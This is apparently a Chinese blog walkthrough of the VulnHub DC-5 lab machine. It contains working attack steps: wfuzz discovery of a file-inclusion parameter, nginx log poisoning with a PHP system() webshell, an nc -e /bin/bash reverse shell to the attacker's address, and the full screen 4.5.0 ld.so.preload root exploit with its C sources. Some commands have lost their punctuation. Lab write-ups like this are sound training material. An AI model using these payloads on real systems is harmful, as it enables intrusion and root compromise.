手把手教通关Vulnhub靶场-DC5靶机
一.靶机下载官方链接https://download.vulnhub.com/dc/DC-5.zip网盘链接:https://pan.baidu.com/s/1eRXBBhv4vuL3pEBsQ8Wayg 提取码: m7in导入之后要在设置中将其调为NAT模式默认情况我们是不知道靶机的密码的目的是通过kali获取靶机中的flag信息二.靶机信息收集因为靶机与kali处于同一网络状态下使用命令arp-scan -l得到靶机的ip为192.168.194.137使用命令nmap -A 192.168.194.137对靶机进行扫描发现靶机开放了80端口尝试对80端口进行访问三.漏洞扫描使用dirsearch扫描一下敏感目录使用命令dirsearch -u http://192.168.194.137访问footer.php和thankyou.php的时候发现刷新网页时间会改变但在其他网页不会变化所以猜测在thankyou.php文件中包含footer.php文件存在文件包含thankyou.php无明显文件参数用 wfuzz 爆破 GET 参数使用命令wfuzz -c --hh1200 -z file,/usr/share/wfuzz/wordlist/general/common.txt http://192.168.194.137/thankyou.php?FUZZ/etc/passwd发现存在参数file访问http://192.168.194.137/thankyou.php?file/etc/passwd得到命令执行的回显四.上传webshell将?php system($_GET[cmd]) ?传入发现服务器为nginx于是尝试访问nginx的日志信息http://192.168.194.137/thankyou.php?file/var/log/nginx/error.log接着反弹shell使用命令http://192.168.194.137/thankyou.php?file/var/log/nginx/error.logcmdnc -e /bin/bash 192.168.194.134 1111nc lvvp 1111获取交互式shell使用命令python -c import pty; pty.spawn(/bin/bash);五.提权使用命令find / -perm -4000 -type f 2/dev/null发现/bin/screen-4.5.0确认提权点在msf里面寻找提权的poc使用命令searchsploit screen 4.5.0使用命令cat /usr/share/exploitdb/exploits/linux/local/41154.sh查看到这个poc的利用方式将41154.sh中上面一部分c语言代码另存为libhax.c#includestdio.h#includesys/types.h#includeunistd.h#includesys/stat.h__attribute__ ((__constructor__))voiddropshell(void){chown(/tmp/rootshell, 0, 0);chmod(/tmp/rootshell, 04755);unlink(/etc/ld.so.preload);printf([] done!\n);}使用命令gcc -fPIC -shared -ldl -o libhax.so libhax.c将41154.sh中下面一部分c语言代码另存为rootshell.c#includestdio.h#includeunistd.h#includesys/types.hintmain(void){setuid(0);setgid(0);seteuid(0);setegid(0);char*argv[] {/bin/sh, NULL};execvp(argv[0], argv);return0;}使用命令gcc -static -o rootshell rootshell.c将41154.sh中剩下部分代码另存为dc5.sh脚本文件#!/bin/bashecho~ gnu/screenroot ~echo[] Now we create our /etc/ld.so.preload file...cd/etcumask000# becausescreen-D-m-Lld.so.preloadecho-ne \x0a/tmp/libhax.so# newline neededecho[] Triggering...screen-ls# screen itself is setuid, so.../tmp/rootshell使用命令vim dc5.sh:set ffunix | wqchmodZx dc5.shpython3 -m http.server 8080切换到反弹shell页面使用命令cd /tmpwget http://192.168.194.134:8080/libhax.sowget http://192.168.194.134:8080/rootshellwget http://192.168.194.134:8080/dc5.sh使用命令cd /rootcat thisistheflag.txt成功获取最后的flag如有错误请大佬们指正到这里我们也是成功通关了DC5靶机后续会接着更新DC系列的靶机通关教程请多多关注一下

相关新闻

Feature Selection实战指南:从237个字段砍到50个的工程化决策方法

Feature Selection实战指南:从237个字段砍到50个的工程化决策方法

1. 这不是“降维”课,是数据工程师每天在救火时用的 Feature Selection 第一关“Dimensional Reduction — Feature Selection Part 1”这个标题乍看像教科书里的章节名,但我在金融风控建模组干了八年,带过十七个新人,亲手跑废过三…

2026/7/19 3:35:06 阅读更多 →
718:public internl class;partial []

718:public internl class;partial []

1 public internal class Product { } 代码解析:public internal class Product 1. 语法报错:修饰符冲突,无法编译 C# 类的访问修饰符不能同时写 public internal,二者互斥: public:程序集内外任意代码都能…

2026/7/19 3:34:06 阅读更多 →
关于C++网络编程中Epoll和套接字阻塞与非阻塞有感

关于C++网络编程中Epoll和套接字阻塞与非阻塞有感

前情提要:小编本人是刚开始学C网络编程的学生,来记录一下学习笔记,大家如果看到有错误请不要吝啬您的指导,助力每一位it追梦人我们创建的套接字不管是连接套接字Acceptor_fd还是客户端套接字Client_fd都会放到Epoll中来进行管理&a…

2026/7/19 3:34:06 阅读更多 →

最新新闻

Java Swing中JOptionPane对话框使用详解

Java Swing中JOptionPane对话框使用详解

1. JOptionPane提示框基础入门作为Java Swing组件库中最常用的交互工具之一,JOptionPane提供了四种核心对话框类型,每种类型都有其特定的使用场景和参数配置方式。我们先从最基本的消息对话框开始:// 最简单的消息提示框 JOptionPane.showMes…

2026/7/19 20:01:43 阅读更多 →
AutoCAD二次开发:ObjectARX C++ API深度解析与实战指南

AutoCAD二次开发:ObjectARX C++ API深度解析与实战指南

1. 项目概述:为什么选择ObjectARX? 如果你是一名AutoCAD的深度用户,或者是一名CAD二次开发工程师,那么你一定对“功能不够用”或“重复劳动”深有感触。AutoCAD本身是一个强大的绘图平台,但面对千变万化的行业需求——…

2026/7/19 20:01:43 阅读更多 →
轻量级Transformer边缘部署:TinyBERT-4L故障检测性能基准与INT8量化实践

轻量级Transformer边缘部署:TinyBERT-4L故障检测性能基准与INT8量化实践

# 轻量级Transformer边缘部署:TinyBERT-4L故障检测性能基准与INT8量化实践## 1. 背景:边缘故障检测的“不可能三角”工业设备故障检测正经历从云端推理向边缘侧迁移的浪潮。实时诊断要求毫秒级响应,但资源受限的嵌入式设备(如PLC、…

2026/7/19 20:01:43 阅读更多 →
从TinyML到GenAI:基于FRDM的边缘AI全栈开发实战

从TinyML到GenAI:基于FRDM的边缘AI全栈开发实战

# 从TinyML到GenAI:基于FRDM的边缘AI全栈开发实战## 一、背景与挑战当大语言模型(LLM)和生成式AI(GenAI)席卷云端时,一个根本性的工程矛盾正在凸显:**云计算无法满足低延迟、数据隐私和离线运行…

2026/7/19 20:01:43 阅读更多 →
微服务架构高级应用(一):从“拆服务”走向高可用、高并发、可治理、可观测

微服务架构高级应用(一):从“拆服务”走向高可用、高并发、可治理、可观测

微服务架构高级应用(一):从“拆服务”走向高可用、高并发、可治理、可观测 摘要: 很多项目完成微服务拆分后,系统复杂度并没有下降,反而出现调用链变长、故障扩散、数据一致性困难、日志分散和发布风险增加…

2026/7/19 20:01:43 阅读更多 →
高效简历写作:一分钟搞定技术岗位的精准信息传递

高效简历写作:一分钟搞定技术岗位的精准信息传递

你是不是也经历过这样的场景:深夜打开招聘网站,看到心仪岗位的截止日期就在明天,但简历还是一片空白。或者工作几年后想换个环境,却发现过去的经历散落在各个项目里,不知道如何组织成一份有说服力的简历。更常见的是&a…

2026/7/19 20:00:43 阅读更多 →

日新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/19 0:00:40 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/19 0:00:40 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/19 0:00:40 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/19 0:00:40 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/19 0:00:40 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/19 0:00:40 阅读更多 →

月新闻